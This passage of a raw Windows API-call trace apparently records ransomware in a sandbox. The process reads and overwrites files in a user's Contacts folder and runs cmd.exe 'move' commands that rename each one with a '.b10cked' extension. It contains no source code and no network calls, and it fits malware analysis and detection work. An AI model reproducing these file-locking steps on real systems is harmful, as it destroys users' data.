lpDistanceToMoveHigh=0x12ec78*=0) returned 0x277 [0218.503] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x274, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x274, lpOverlapped=0x0) returned 1 [0218.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-628, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x277 [0218.504] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x274, lpOverlapped=0x0) returned 1 [0218.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ihnvbh euuncnh.contact", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0218.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ihnvbh euuncnh.contact", cchWideChar=22, 
lpMultiByteStr=0x13286a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ihnvbh euuncnh.contact", lpUsedDefaultChar=0x0) returned 22 [0218.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4eb [0218.507] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0218.507] CloseHandle (hObject=0x1b4) returned 1 [0218.508] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON") returned 0x26 [0218.508] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0218.509] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x698, dwThreadId=0x514)) 
returned 1 [0218.512] CloseHandle (hObject=0x120) returned 1 [0218.512] CloseHandle (hObject=0x1b4) returned 1 [0218.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0218.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0218.512] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.512] ReleaseMutex (hMutex=0xf8) returned 1 [0218.512] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] QueryPerformanceCounter (in: 
lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27530217750) returned 1 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.513] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4e8 [0218.514] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.515] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) 
returned 0x0 [0218.515] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.233] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.233] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.233] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x275 [0219.234] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.234] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x275 [0219.234] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lodkd auftnm.contact", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lodkd auftnm.contact", cchWideChar=20, lpMultiByteStr=0x13286a4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lodkd auftnm.contact", lpUsedDefaultChar=0x0) returned 20 
[0219.237] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4e8 [0219.237] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.238] CloseHandle (hObject=0x1b4) returned 1 [0219.238] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON") returned 0x26 [0219.239] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.239] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x78c, dwThreadId=0xe9c)) returned 1 [0219.242] CloseHandle (hObject=0x120) returned 1 [0219.242] CloseHandle (hObject=0x1b4) returned 1 [0219.242] CharUpperBuffW (in: 
lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.242] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.242] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.242] ReleaseMutex (hMutex=0xf8) returned 1 [0219.242] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27603190091) returned 1 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.243] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4e9 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.244] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1 [0219.244] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4e9 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.245] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
